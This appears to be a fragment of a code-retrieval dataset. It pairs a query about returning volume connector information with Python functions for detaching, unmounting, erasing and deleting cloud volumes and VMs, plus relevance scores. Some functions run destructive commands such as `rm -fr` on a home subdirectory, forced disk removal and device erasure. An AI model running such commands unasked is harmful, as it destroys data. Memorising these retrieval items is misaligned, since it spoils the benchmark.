detach volume {0} from instance {1}'\n .format(volume_id, instance_id))\n\n utils.unassign_runtime_property_from_resource(\n 'instance_id', ctx.source.instance)\n ctx.logger.info(\n 'Detached volume {0} from instance {1}.'\n .format(volume_id, instance_id))", "def hard_reset(self) -> None:\n os.system('rm -fr \"$HOME/.daf/\"')", "def remove_vdisk_from_svc(svc, vdisk):\r\n svc_ssh = openSSH(svc, getpass.getuser())\r\n ## First we need to unmap from the host\r\n print \"Removing the mapping between %s on %s...\" % (vdisk[\"name\"],\r\n vdisk[\"hostlist\"][0])\r\n command = \"rmvdiskhostmap -host %s %s\" % (vdisk[\"hostlist\"][0],\r\n vdisk[\"name\"])\r\n print command\r\n output = svc_ssh.exec_command(command)[1].readlines()\r\n for line in output:\r\n print line.strip()\r\n ## Remove the volume\r\n print \"Removing the vdisk %s...\" % vdisk[\"name\"]\r\n command = \"rmvdisk %s\" % vdisk[\"name\"]\r\n print command\r\n output = svc_ssh.exec_command(command)[1].readlines()\r\n for line in output:\r\n print line.strip()\r\n svc_ssh.close()\r\n ## End remove_vdisk_from_svc\r", "def _ConvertDrbdToPlain(self, feedback_fn):\n secondary_nodes = self.cfg.GetInstanceSecondaryNodes(self.instance.uuid)\n disks = self.cfg.GetInstanceDisks(self.instance.uuid)\n assert len(secondary_nodes) == 1\n assert utils.AnyDiskOfType(disks, [constants.DT_DRBD8])\n\n feedback_fn(\"Converting disk template from 'drbd' to 'plain'\")\n\n old_disks = AnnotateDiskParams(self.instance, disks, self.cfg)\n new_disks = [d.children[0] for d in disks]\n\n # copy over size, mode and name and set the correct nodes\n for parent, child in zip(old_disks, new_disks):\n child.size = parent.size\n child.mode = parent.mode\n child.name = parent.name\n child.nodes = [self.instance.primary_node]\n\n # this is a DRBD disk, return its port to the pool\n for disk in old_disks:\n tcp_port = disk.logical_id[2]\n self.cfg.AddTcpUdpPort(tcp_port)\n\n # Remove the old disks from the instance\n for old_disk in old_disks:\n self.cfg.RemoveInstanceDisk(self.instance.uuid, old_disk.uuid)\n\n # Attach the new disks to the instance\n for (idx, new_disk) in enumerate(new_disks):\n self.cfg.AddInstanceDisk(self.instance.uuid, new_disk, idx=idx)\n\n # re-read the instance from the configuration\n self.instance = self.cfg.GetInstanceInfo(self.instance.uuid)\n\n # Release locks in case removing disks takes a while\n ReleaseLocks(self, locking.LEVEL_NODE)\n\n feedback_fn(\"Removing volumes on the secondary node...\")\n RemoveDisks(self, self.instance, disks=old_disks,\n target_node_uuid=secondary_nodes[0])\n\n feedback_fn(\"Removing unneeded volumes on the primary node...\")\n meta_disks = []\n for idx, disk in enumerate(old_disks):\n meta_disks.append(disk.children[1])\n RemoveDisks(self, self.instance, disks=meta_disks)", "def down(**kwargs):\n call([\"vagrant\", \"suspend\"], env=env)\n return", "def down(config):\n pass", "def invalidateBoot (self):\n if self.isBootValid(): \n self.mountBootPartition()\n installFilePath = self._getBootInstallationFilePath()\n if os.path.exists(installFilePath):\n os.remove(installFilePath)\n\n #self._runCommandRaiseIfFail(\"rm -rf %s\" % (self._getBootInstallationFilePath()))\n self._log(\"invalidate-boot\").notice(\"boot partition is invalidated\")\n else:\n self._log(\"invalidate-boot\").notice(\"boot partition is already invalid\")", "def teardown(self):\n self.logger.info('Tearing down file server vm')\n self.local_env.execute('uninstall', task_retries=40,\n task_retry_interval=30)", "def deactivate(self):\n if self.parents[0].type == 'dm-multipath':\n devmap = block.getMap(major=self.major, minor=self.minor)\n if devmap:\n try:\n block.removeDeviceMap(devmap)\n except Exception as e:\n raise errors.DeviceTeardownError(\"failed to tear down device-mapper partition %s: %s\" % (self.name, e))\n udev.settle()", "def attach_disk_to_vm(self, vm_ref, instance_name,\n adapter_type, disk_type, vmdk_path=None,\n disk_size=None, linked_clone=False,\n controller_key=None, unit_number=None,\n device_name=None):\n client_factory = self._session._get_vim().client.factory\n vmdk_attach_config_spec = vm_util.get_vmdk_attach_config_spec(\n client_factory, adapter_type, disk_type,\n vmdk_path, disk_size, linked_clone,\n controller_key, unit_number, device_name)\n\n LOG.debug(_(\"Reconfiguring VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())\n reconfig_task = self._session._call_method(\n self._session._get_vim(),\n \"ReconfigVM_Task\", vm_ref,\n spec=vmdk_attach_config_spec)\n self._session._wait_for_task(instance_name, reconfig_task)\n LOG.debug(_(\"Reconfigured VM instance %(instance_name)s to attach \"\n \"disk %(vmdk_path)s or device %(device_name)s with type \"\n \"%(disk_type)s\") % locals())", "def detach(self):\n raise NotImplementedError()", "def reconfigure_nova_ephemeral_disk(self):\n self.check_run('reconfigure_nova_ephemeral_disk')\n self.show_step(1, initialize=True)\n self.env.revert_snapshot(\"reconfigure_overcommit_ratio\")\n\n cluster_id = self.fuel_web.get_last_created_cluster()\n computes = self.fuel_web.get_nailgun_cluster_nodes_by_roles(\n cluster_id, ['compute'])\n\n self.show_step(2)\n existing_configs = self.fuel_web.client.list_configuration(\n cluster_id)\n for existing_config in existing_configs:\n self.fuel_web.client.delete_configuration(existing_config[\"id\"])\n\n self.show_step(3)\n config = utils.get_config_template('nova_disk')\n structured_config = get_structured_config_dict(config)\n self.fuel_web.client.upload_configuration(config,\n cluster_id,\n role='compute')\n\n service_name = \"nova-compute\"\n\n uptimes = self.get_service_uptime(computes, service_name)\n\n self.show_step(4)\n task = self.fuel_web.client.apply_configuration(cluster_id,\n role='compute')\n self.show_step(5)\n self.fuel_web.assert_task_success(task, timeout=900, interval=5)\n\n self.show_step(6)\n self.check_service_was_restarted(computes, uptimes, service_name)\n\n self.show_step(7)\n self.check_config_on_remote(computes, structured_config)\n\n os_conn = os_actions.OpenStackActions(\n self.fuel_web.get_public_vip(cluster_id))\n\n self.show_step(8)\n self.show_step(9)\n self.show_step(10)\n self.show_step(11)\n self.show_step(12)\n self.check_nova_ephemeral_disk(os_conn, cluster_id)\n\n self.env.make_snapshot(\"reconfigure_nova_ephemeral_disk\",\n is_make=True)", "def disconnect_filesystem(self, *args, **kwargs):\n return self._get_storage().disconnect_filesystem(*args, **kwargs)", "def _umount_with_detach(entry_path):\n try:\n fs_linux.umount_filesystem(entry_path)\n except OSError as err:\n _LOGGER.warning('Failed to umount %s: %s',\n entry_path, err)\n # 16 means device busy\n if err.errno == 16:\n try:\n fs_linux.umount_filesystem(entry_path, lazy=True)\n except OSError as err:\n _LOGGER.warning('Failed to lazy umount %s: %s',\n entry_path, err)", "def detach_volume(self, volume_id, instance_id=None,\r\n device=None, force=False):\r\n params = {'VolumeId' : volume_id}\r\n if instance_id:\r\n params['InstanceId'] = instance_id\r\n if device:\r\n params['Device'] = device\r\n if force:\r\n params['Force'] = 'true'\r\n return self.get_status('DetachVolume', params, verb='POST')", "def detach_volume(self, volume: Union[dto.Volume, str]) -> dto.Volume:\n raise errors.UnsupportedOperationError(\n \"Operation not supported for provider '{}'\".format(self.provider_name)\n )", "def vm_deprovision(self, params: dict) -> Tuple[\"Status\", dict]:", "def down(\n context,\n user=get_local_user(),\n remote=False,\n instance=None,\n stack=None,\n images=\"all\",\n volumes=True,\n orphans=False,\n):\n command = f\"down --rmi {images}\"\n\n if volumes:\n command = f\"{command} --volumes\"\n\n if orphans:\n command = f\"{command} --remove-orphans\"\n\n run_command(context, user, remote, instance, stack, command)", "def storage_reset(self):\n daos_srv_bin = os.path.join(self.daosbinpath, \"daos_server\")\n cmd = \"{} storage prepare -n --reset -f\".format(daos_srv_bin)\n result = pcmd(self._hosts, cmd)\n if len(result) > 1 or 0 not in result:\n raise ServerFailed(\"Error resetting NVMe storage\")", "def set_virtual_disk_storage_profile(vm, hardware_device, profile):\n\n spec = vim.vm.ConfigSpec()\n device_specs = []\n profile_specs = []\n profile_spec = vim.vm.DefinedProfileSpec()\n profile_spec.profileId = profile.profileId.uniqueId\n profile_specs.append(profile_spec)\n\n device_spec = vim.vm.device.VirtualDeviceSpec()\n device_spec.operation = vim.vm.device.VirtualDeviceSpec.Operation.edit\n device_spec.device = hardware_device\n device_spec.profile = profile_specs\n device_specs.append(device_spec)\n spec.deviceChange = device_specs\n vm.ReconfigVM_Task(spec)", "def unmap(self, ignore_fail=False):\n run_cmd('kpartx', '-d', self.filename, ignore_fail=ignore_fail)\n for part in self.partitions:\n self.mapdev = None", "def DetachVolume(self, request, global_params=None):\n config = self.GetMethodConfig('DetachVolume')\n return self._RunMethod(\n config, request, global_params=global_params)", "def detach(self, phy_layer):\n self._attached_phys.remove(phy_layer)", "def peer_detach(mnode, server, force=False):\n if force:\n cmd = \"gluster peer detach %s force --mode=script\" % server\n else:\n cmd = \"gluster peer detach %s --mode=script\" % server\n return g.run(mnode, cmd)", "def deprovision(project, node, network, nic):\n data = {constants.PROJECT_PARAMETER: project,\n constants.NODE_NAME_PARAMETER: node,\n constants.NETWORK_PARAMETER: network,\n constants.NIC_PARAMETER: nic}\n res = requests.delete(_url + \"deprovision/\", data=data, auth=(\n _username, _password))\n click.echo(res.content)", "def unmount(self, path=None, vm=None):\n os.system(f\"multipass unmount {vm}:{path}\")\n dict_result = self._get_mount_status(vm=vm)\n return dict_result", "def down(self, arguments):\n force = arguments['--force']\n\n instance_name = arguments['<instance>']\n instance_name = self.activate(instance_name)\n\n vmrun = VMrun(self.vmx, user=self.user, password=self.password)\n if not force and vmrun.installedTools():\n stopped = vmrun.stop()\n else:\n stopped = vmrun.stop(mode='hard')\n if stopped is None:\n puts_err(colored.red(\"Not stopped\", vmrun))\n else:\n puts_err(colored.green(\"Stopped\", vmrun))", "def reboot_guest(self, vm):\n try:\n self.client.reboot_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def RevertVolume(self, uuid, passphrase, passwd=''):\n if not util.UuidIsValid(uuid):\n raise storage.InvalidUUIDError('Invalid UUID: ' + uuid)\n self.UnlockVolume(uuid, passphrase)\n returncode, _, _ = util.Exec(\n ('sudo', '-k', '-S', FDESETUP, 'disable'),\n stdin=passwd+'\\n')\n\n if returncode != 0:\n raise storage.CouldNotRevertError('Could not disable encryption (%s).' % (\n returncode))", "def remove():\n vbox = Vbox(env.vm_name)\n vbox.remove()", "def detach(self):\n if (self.status == volume_status.ATTACHED or self.status == volume_status.IN_USE) \\\n and self.volume:\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\"\n % (self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n self.wait_for_status(volume_status.AVAILABLE, 240)\n if self.volume and self.status != volume_status.AVAILABLE:\n log.debug('Attempting to detach again.')\n try:\n self.volume.detach()\n except EC2ResponseError, e:\n log.error(\"Detaching volume '%s' from instance '%s' failed. Exception: %s\" % (\n self.volume_id, self.app.cloud_interface.get_instance_id(), e))\n return False\n if not self.wait_for_status(volume_status.AVAILABLE, 60):\n log.warning('Volume {0} did not detach properly. Left in state {1}'\n .format(self.volume_id, self.status))\n return False\n else:\n log.debug(\"Volume '%s' already not attached ('%s')\"\n % (self.volume_id, self.status))\n return False\n return True", "def umount_mdv():\n with open(\"/proc/self/mounts\", \"r\") as mounts:\n for line in mounts.readlines():\n if \"/stratis/.mdv-\" in line:\n mountpoint = line.split()[1]\n exec_command([\"umount\", mountpoint])", "def deconfigure(self):\n\n self.platform.deconfigure()", "def down(config, database, semester, course):\n pass", "def down(config, database, semester, course):\n pass", "def reset_old_config(self):\n stringa = \"tc qdisc del dev \" + self.__interface + \" root\"\n cmd = shlex.split(stringa)\n proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n try:\n o, e = proc.communicate(timeout=1)\n except subprocess.TimeoutExpired:\n proc.kill()\n raise RuntimeWarning(\"Old configuration not eliminated\")\n\n if e.decode('ascii') != \"\":\n raise RuntimeError(e.decode('ascii'))\n return proc.returncode", "def remove(self, mount_point, delete_vols=False, detach=True):\n log.debug(\"Removing volume-based FS @ mount point {0} (delete_vols: \"\n \"{1}; detach: {2})\".format(mount_point, delete_vols, detach))\n self.unmount(mount_point)\n if detach:\n log.debug(\"Detaching volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if self.detach():\n log.debug(\"Detached volume {0} as {1}\".format(\n self.volume_id, self.fs.get_full_name()))\n if ((self.static and (ServiceRole.GALAXY_DATA not in self.fs.svc_roles))\n or delete_vols):\n log.debug(\"Deleting volume {0} as part of {1} removal\".format(\n self.volume_id, self.fs.get_full_name()))\n self.delete()\n else:\n log.debug(\"Unmounted {0} but was instructed not to detach volume {1}\"\n .format(self.fs.get_full_name(), self.volume_id))", "def erase_device(device):\n command = 'erase \"%s\"' % (device.udid,)\n _run_command(command)", "def pull_disk(self, disk, update_fields=None):\n import_time = timezone.now()\n imported_disk = self.import_disk(\n disk.vm.backend_id, disk.backend_id, save=False\n )\n\n disk.refresh_from_db()\n if disk.modified < import_time:\n if not update_fields:\n update_fields = models.Disk.get_backend_fields()\n\n update_pulled_fields(disk, imported_disk, update_fields)", "def unmap_volume(self, host_name, volume_name):\n cmd = \"svctask rmvdiskhostmap -host %s %s\" % \\\n (host_name, volume_name)\n self._svc_command(cmd)", "def deconfigure(self):\n yield self._r2rm_client.until_synced(2)\n response = yield self._r2rm_client.req.force_deconfigure_board(self._icom_id)\n if not response.reply.reply_ok():\n self.log.error(\"Error on deconfigure request: {}\".format(\n response.reply.arguments[1]))\n raise EddRoach2ProductError(response.reply.arguments[1])\n self.teardown_sensors()\n self._firmware = None\n self._icom_id = None", "def remove_device(self, path):\n pass", "def unexport_disk(self, initiator_iqn, volume_name, iscsi_config):\n lun_name = self._lun_name(volume_name)\n LOG.debug(\"unexport lun %(lun)s\", {'lun': lun_name})\n lun = self._get_lun(iscsi_config, lun_name, initiator_iqn)\n if not lun:\n LOG.debug(\"Didn't find LUN on gateway.\")\n return\n\n try:\n LOG.debug(\"unexporting %(lun)s\", {'lun': lun_name})\n self.client.unexport_disk(self.target_iqn, initiator_iqn,\n self.configuration.rbd_pool,\n volume_name)\n except client_exceptions.ClientException as ex:\n LOG.exception(ex)\n raise exception.VolumeBackendAPIException(\n data=ex.get_description())", "def erase(self):\n command = \"export STLINK_DEVICE=\" + self.stlink.port + \"; st-flash erase\"\n subprocess.run(command, shell=True)\n time.sleep(1)", "def umount(self, vol_name, mountpoint, instance):\n LOG.debug('_HostMountState.umount(vol_name=%(vol_name)s, '\n 'mountpoint=%(mountpoint)s) generation %(gen)s',\n {'vol_name': vol_name, 'mountpoint': mountpoint,\n 'gen': self.generation}, instance=instance)\n with self._get_locked(mountpoint) as mount:\n try:\n mount.remove_attachment(vol_name, instance.uuid)\n except KeyError:\n LOG.warning(\"Request to remove attachment (%(vol_name)s from \"\n \"%(mountpoint)s, but we don't think it's in use.\",\n {'vol_name': vol_name, 'mountpoint': mountpoint},\n instance=instance)\n\n if not mount.in_use():\n mounted = os.path.ismount(mountpoint)\n\n if mounted:\n mounted = self._real_umount(mountpoint)\n\n # Delete our record entirely if it's unmounted\n if not mounted:\n del self.mountpoints[mountpoint]\n\n LOG.debug('_HostMountState.umount() for %(mountpoint)s '\n 'generation %(gen)s completed successfully',\n {'mountpoint': mountpoint, 'gen': self.generation},\n instance=instance)", "def detach_volume(self, volume):\r\n if hasattr(volume, \"id\"):\r\n volume_id = volume.id\r\n else:\r\n volume_id = volume\r\n return self.ec2.detach_volume(volume_id=volume_id, instance_id=self.instance_id)", "def eject(mountpoint=DMG_MOUNT, silent=False, dry_run=ARGS.dry_run):\n if not isinstance(mountpoint, Path):\n mountpoint = Path(mountpoint)\n\n cmd = ['/usr/bin/hdiutil', 'eject', str(mountpoint)]\n\n if not dry_run and not mountpoint.exists():\n LOG.warning('Cannot unmount {mountpoint} - it does not exist'.format(mountpoint=mountpoint))\n elif not dry_run and mountpoint.exists():\n _p = subprocess.run(cmd, capture_output=True, encoding='utf-8')\n LOG.debug('{cmd} ({returncode})'.format(cmd=' '.join([str(x) for x in cmd]), returncode=_p.returncode))\n\n if _p.returncode == 0:\n if not silent:\n LOG.info('Unmounted {mountpoint}'.format(mountpoint=mountpoint))\n else:\n LOG.debug('Error: '. _p.stderr.strip() if _p.stderr else _p.stdout.strip())\n elif ARGS.dry_run and not dry_run:\n LOG.warning('Unmount {mountpoint}'.format(mountpoint=mountpoint))", "def memory(self, memory_mb):\n\n config_spec = vim.vm.ConfigSpec()\n config_spec.memoryMB = memory_mb\n return self.vm_obj.ReconfigVM_Task(config_spec)", "def unmount(self, client):\n log(\"Unmounting %s backend from %s\" %\n (self.backend, self.path), self.opt)\n getattr(client, self.unmount_fun)(mount_point=self.path)", "def do_network_detach(cs, args):\n opts = {}\n opts['container'] = args.container\n opts['network'] = args.network\n opts['port'] = args.port\n opts = zun_utils.remove_null_parms(**opts)\n try:\n cs.containers.network_detach(**opts)\n print(\"Request to detach network from container %s \"\n \"has been accepted.\" % args.container)\n except Exception as e:\n print(\"Detach network from container %(container)s \"\n \"failed: %(e)s\" % {'container': args.container, 'e': e})", "def restoreCowPartition(disk):\n currentRoot = getCurrentRootPartition(disk)\n\n mountDir = mount(currentRoot)\n if mountDir is None:\n return False\n\n cowDir = mount(\"%s5\" % disk)\n if cowDir is None:\n return False\n\n path = os.path.join(mountDir, COW_BACKUP)\n cmd = \"tar -xzp --numeric-owner -f %s -C %s\" % (path, cowDir) \n status, output = commands.getstatusoutput(cmd)\n if status != 0:\n return False\n\n os.remove(path)\n\n if (not umount(mountDir)) or (not umount(cowDir)):\n return False\n\n rc = subprocess.call(\"nvsetenv boot-once \\\"\\\" &>/dev/null\", shell=True)\n if rc == 1:\n return False\n\n return True", "def shutdownVM(self):\n\t\tlog.info(\"\\tStopping the container...\")\n#\t\texecuteCommandSSH(\"lxc-stop\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"lxc-destroy\" + \" -n \" + self.id)\n\t\texecuteCommandSSH(\"shutdown -h now\")", "def destroy_node(self):\n driver = self.driver\n driver.ex_detach_floating_ip_from_node(self.node, self.floating_ip)\n driver.destroy_node(self.node)\n sleep(15)\n for volume in self.volumes:\n driver.destroy_volume(volume)", "def deleteVirtualMachine(self,node,vmid):\n data = self.connect('delete',\"nodes/%s/qemu/%s\" % (node,vmid),None)\n return data", "def reset_virtual_machine(self, vm):\n try:\n self.client.reset_vm(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def destroy_vm_vdis(name=None, session=None, call=None):\n if session is None:\n session = _get_session()\n ret = {}\n # get vm object\n vms = session.xenapi.VM.get_by_name_label(name)\n if len(vms) == 1:\n # read virtual block device (vdb)\n vbds = session.xenapi.VM.get_VBDs(vms[0])\n if vbds is not None:\n x = 0\n for vbd in vbds:\n vbd_record = session.xenapi.VBD.get_record(vbd)\n if vbd_record[\"VDI\"] != \"OpaqueRef:NULL\":\n # read vdi on vdb\n vdi_record = session.xenapi.VDI.get_record(vbd_record[\"VDI\"])\n if \"iso\" not in vdi_record[\"name_label\"]:\n session.xenapi.VDI.destroy(vbd_record[\"VDI\"])\n ret[\"vdi-{}\".format(x)] = vdi_record[\"name_label\"]\n x += 1\n return ret", "def delete_volume(self, uid):\n try:\n volInfo = self.get_volume_info(uid)\n except SVCVolumeNotFound as ex:\n LOG.warn(_(\"No volume with UID %s found.\") % uid)\n # assume deleted if not found\n return\n\n volID = volInfo.get(SVC_KEY_VDISK_ID)\n self.remove_fcmapping(uid)\n cmd = \"svctask rmvdisk -force %s\" % (volID)\n self._svc_command(cmd)", "def detach_entity(self, entity_id):\n attachment = getattr(self.entities[entity_id],\n self.attachment_system.system_id)\n if not attachment.is_root:\n self.attachment_system.detach_child(entity_id)", "def deconfigure(self):\n\n pass", "def cleanup_infrastructure_storage(config, datacenter):\n print \"Removing storage devices in datacenter %s...\" % datacenter.getName()\n for device in datacenter.listStorageDevices():\n device.delete()", "def detach_volume(self, volume_id, instance_id = \"\"):\n response = volume.detach_volume(self.url, self.verb, self.headers,\n self.version, volume_id, instance_id)\n if response is not None :\n res = DetachVolumeResponse.DetachVolumeResponse()\n parseString(str(response.text), res)\n return res\n else :\n return None", "def shutdown_guest(self, vm):\n try:\n self.client.shutdown_guest(vm.backend_id)\n except VMwareError as e:\n raise VMwareBackendError(e)", "def eject_image(self, identity, device):\n device_info = self._get_device(identity, device)\n\n device_info['Image'] = ''\n device_info['ImageName'] = ''\n device_info['Inserted'] = False\n device_info['WriteProtected'] = False\n device_info['UserName'] = ''\n device_info['Password'] = ''\n\n self._devices.update({(identity, device): device_info})\n\n local_file = device_info.pop('_local_file', None)\n if local_file:\n try:\n os.unlink(local_file)\n\n self._logger.debug(\n 'Removed local file %(file)s for %(identity)s' % {\n 'identity': identity, 'file': local_file})\n except FileNotFoundError:\n # Ignore error as we are trying to remove the file anyway\n pass", "def vm_delete(vm_hostname, retire=False):\n\n with _get_vm(vm_hostname, unlock=retire, allow_retired=True) as vm:\n if vm.dataset_obj['datacenter_type'] == 'aws.dct':\n vm_status_code = vm.aws_describe_instance_status(\n vm.dataset_obj['aws_instance_id'])\n if vm_status_code != AWS_RETURN_CODES['stopped']:\n raise InvalidStateError(\n '\"{}\" is still running.'.format(vm.fqdn))\n else:\n vm.aws_delete()\n elif vm.dataset_obj['datacenter_type'] == 'kvm.dct':\n # Make sure the VM has a hypervisor and that it is defined on it.\n # Abort if the VM has not been defined.\n _check_defined(vm)\n\n # Make sure the VM is shut down, abort if it is not.\n if (\n vm.hypervisor\n and vm.hypervisor.vm_defined(vm)\n and vm.is_running()\n ):\n raise InvalidStateError('\"{}\" is still running.'.format(\n vm.fqdn)\n )\n\n # Delete the VM from its hypervisor if required.\n if vm.hypervisor and vm.hypervisor.vm_defined(vm):\n vm.hypervisor.undefine_vm(vm)\n else:\n raise NotImplementedError(\n 'This operation is not yet supported for {}'.format(\n vm.dataset_obj['datacenter_type'])\n )\n\n # Delete the machines cert from puppet in case we want to build one with the same name in the future\n clean_cert(vm.dataset_obj)\n\n # Delete the serveradmin object of this VM\n # or update its state to 'retired' if retire is True.\n if retire:\n vm.dataset_obj['state'] = 'retired'\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and set to \"retired\" state.'.format(\n vm.fqdn)\n )\n else:\n vm.dataset_obj.delete()\n vm.dataset_obj.commit()\n log.info(\n '\"{}\" is destroyed and deleted from Serveradmin'.format(\n vm.fqdn)\n )", "def unmountLXCPrivate(self,node,vmid):\n post_data = None\n data = self.connect('post','nodes/%s/lxc/%s/status/unmount' % (node,vmid), post_data)\n return data", "def umount_root_vm(self):\n print \"demontage de la partition root de %s\" % name_vm_dest\n self.exec_cmd(\"umount %s\" % self.rep_vhosts_vm)", "def hfp_sp_detach(handle, sp_dn):\r\n\r\n sp = handle.query_dn(sp_dn)\r\n if sp is None:\r\n raise ValueError(\"sp does not exist.\")\r\n\r\n sp.host_fw_policy_name = \"\"\r\n handle.set_mo(sp)\r\n handle.commit()\r\n return sp", "def cleanup(self, context, instance, network_info, block_device_info=None,\n destroy_disks=True):\n pass" ]
[ "0.765152", "0.71042055", "0.710292", "0.7051662", "0.6706635", "0.66381764", "0.65310085", "0.63526535", "0.62885463", "0.62843525", "0.6217464", "0.62058824", "0.6176701", "0.61576825", "0.6140649", "0.6140027", "0.6105745", "0.6038374", "0.6036814", "0.5985441", "0.58947974", "0.5870777", "0.5870777", "0.5830202", "0.5812258", "0.57748884", "0.57565343", "0.5755057", "0.57426465", "0.5661209", "0.5659315", "0.56199116", "0.561739", "0.5607187", "0.5556421", "0.554693", "0.55364925", "0.5532343", "0.5512811", "0.5505269", "0.54041326", "0.53890795", "0.5381981", "0.53720903", "0.5365602", "0.5339012", "0.5321437", "0.53209406", "0.53197384", "0.53138393", "0.5307628", "0.5297306", "0.529485", "0.5283426", "0.52669513", "0.52540106", "0.5252714", "0.52431434", "0.5241058", "0.5239241", "0.52366567", "0.5232802", "0.52163535", "0.5206508", "0.5199707", "0.51770586", "0.51770586", "0.5160918", "0.5158883", "0.5134983", "0.51309896", "0.51272565", "0.51118726", "0.5111183", "0.510036", "0.50941575", "0.50857514", "0.50835186", "0.50833106", "0.50574726", "0.50522834", "0.5051085", "0.5048217", "0.50416344", "0.5040187", "0.5039953", "0.5020742", "0.502016", "0.5019701", "0.5014547", "0.5010371", "0.50049853", "0.5004707", "0.49991843", "0.4987585", "0.49857342", "0.498407", "0.4982235", "0.49786016", "0.49776378" ]
0.74518675
1
Return volume connector information.
def get_volume_connector(self, instance): iqn = volume_util.get_host_iqn(self._session, self._cluster) return { 'ip': CONF.vmwareapi_host_ip, 'initiator': iqn, 'host': CONF.vmwareapi_host_ip }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def initialize_connection(self, volume, connector):\n export = '%s/%s' % (volume['provider_location'], volume['name'])\n data = {'export': export, 'name': 'volume'}\n if volume['provider_location'] in self.shares:\n data['options'] = self.shares[volume['provider_location']]\n return {\n 'driver_volume_type': self.driver_volume_type,\n 'data': data\n }", "def get_volume_connector(self, instance):\n props = {}\n # 'get_volume_connector' will be invoked during creation\n # of the partition and during deletion of the partition.\n # But 'wwpns' we can access only when partition is available.\n # During spawn flow 'get_volume_connector' function will be called\n # before 'spawn' function so to get 'wwpns' we first creating\n # the partition using 'prep_for_spawn' function so that\n # we can access 'wwpns'.(i.e - else part)\n # But during deletion 'get_volume_connector' will be called\n # after 'destroy' function which will delete the partition so\n # after that we can not get the 'wwpns'\n # In order to get 'wwpns' after 'destroy' function we are\n # saving 'wwpns' before deleting partition in 'destroy' function\n # in 'deleted_instance_wwpns_mapping' variable and using these 'wwpns'\n # in 'get_volume_connector'(i.e - if part)\n # after using these 'wwpns' we are removing these 'wwpns' from\n # 'deleted_instance_wwpns_mapping' variable because\n # we are not going to use these 'wwpns' any more after this.\n if instance.uuid in self.deleted_instance_wwpns_mapping:\n props['wwpns'] = self.deleted_instance_wwpns_mapping.pop(\n instance.uuid)\n else:\n inst = vm.PartitionInstance(instance, self._cpc)\n props['wwpns'] = inst.get_partition_wwpns()\n\n props['host'] = instance.uuid\n\n return props", "def initialize_connection(\n self, volume, connector, is_snapshot=False, lun=None,\n is_mirror=False):\n conn_info, map_info = super(HBSDRESTISCSI, self).initialize_connection(\n volume, connector, is_snapshot, lun)\n return conn_info", "def _get_data(self):\n c = Connector(self.host, self.username, self.password)\n return c.getLanDevices()", "def initialize_connection(self, volume, connector):\n # Non-shared connections was the original implementation where all the\n # export & mapping was done on export and the connection info was\n # stored in the volume, so let the original implementation handle it.\n if not self.share_targets:\n return super().initialize_connection(volume, connector)\n\n # For the shared case the export only stores the path of the volume\n volume_path = volume.provider_location\n if not os.path.exists(volume_path):\n raise exception.InvalidConfigurationValue(\n 'Target driver configured with shared targets, but volume '\n 'exported as non shared.')\n\n nqn, ns_id = self._map_volume(volume, volume_path, connector)\n uuid = self._get_nvme_uuid(volume)\n return {\n 'driver_volume_type': self.protocol,\n 'data': self._get_connection_properties(nqn,\n self.target_ips,\n self.target_port,\n self.nvme_transport_type,\n ns_id, uuid),\n }", "def volume():\n vol = sonos.volume\n return vol", "def Vc(self):\n return self.__central_volume", "def connect_volume(self, connection_properties):\n\n sheepdog_handle = self._get_sheepdog_handle(connection_properties)\n return {'path': sheepdog_handle}", "def volume(self):\n return {'lvad': self._v}", "def connector(self):\n if '_connector' not in self.__dict__:\n from meerschaum.connectors.parse import parse_instance_keys\n conn = parse_instance_keys(self.connector_keys)\n if conn:\n self._connector = conn\n else:\n return None\n return self._connector", "def get_volume(self):\n return self.__volume", "def get_connector_properties(root_helper, *args, **kwargs):\n return {}", "def ConnectionInfo(self):\n if (self._accountKind == \"azure\"):\n print(\"%s: %s\" % (DataConnection.accountName, self._accountName))\n print(\"%s: %s\" % (DataConnection.accountKind, self._accountKind))\n else:\n raise NotImplementedError(DataConnection.notYetImplementedMsg)", "def device_info(self):\n info = {\n \"connections\": {(CONNECTION_NETWORK_MAC, self._data[\"port-mac-address\"])},\n \"manufacturer\": self._ctrl.data[\"resource\"][\"platform\"],\n \"model\": self._ctrl.data[\"resource\"][\"board-name\"],\n \"name\": f\"{self._inst} {self._data['default-name']}\",\n }\n return info", "def volume(self):\n return self.structure.volume", "def get_volume_info(host, disk_object, dc_obj):\n host_resource = get_host_resource_by_name(host)\n\n vol_id = disk_object.get_image_id()\n sd_id = disk_object.get_storage_domains().get_storage_domain()[0].get_id()\n image_id = disk_object.get_id()\n sp_id = dc_obj.get_id()\n\n args = {\n \"storagepoolID\": sp_id,\n \"storagedomainID\": sd_id,\n \"imageID\": image_id,\n \"volumeID\": vol_id,\n }\n\n return host_resource.vds_client(cmd=\"Volume.getInfo\", args=args)", "def getVolume(self):\n return _libsbml.Compartment_getVolume(self)", "def volume(self):\n return self._volume()", "def volume(self):\n return self._volume()", "def getVolume(self):\n return self.__volume", "def get_volume(self):\n return str(round(self._call_player_proxy('VolumeGet', None).unpack()[0]))", "def initialize_connection(self, volume, connector):\n # create client\n initiator_iqn = connector['initiator']\n self.create_client(initiator_iqn)\n auth = self._get_auth_for_client(initiator_iqn)\n username = initiator_iqn\n if not auth['password']:\n password = volume_utils.generate_password(length=self.CHAP_LENGTH)\n self._set_chap_for_client(initiator_iqn, username, password)\n else:\n LOG.debug(\"using existing CHAP password\")\n password = auth['password']\n\n # add disk for export\n iscsi_config = self._get_config()\n\n # First have to ensure that the disk is registered with\n # the gateways.\n self.create_disk(volume.name)\n self.register_disk(self.target_iqn, volume.name)\n\n iscsi_config = self._get_config()\n # Now export the disk to the initiator\n lun = self.export_disk(initiator_iqn, volume.name, iscsi_config)\n\n # fetch the updated config so we can get the lun id\n iscsi_config = self._get_config()\n target_info = iscsi_config['targets'][self.target_iqn]\n ips = 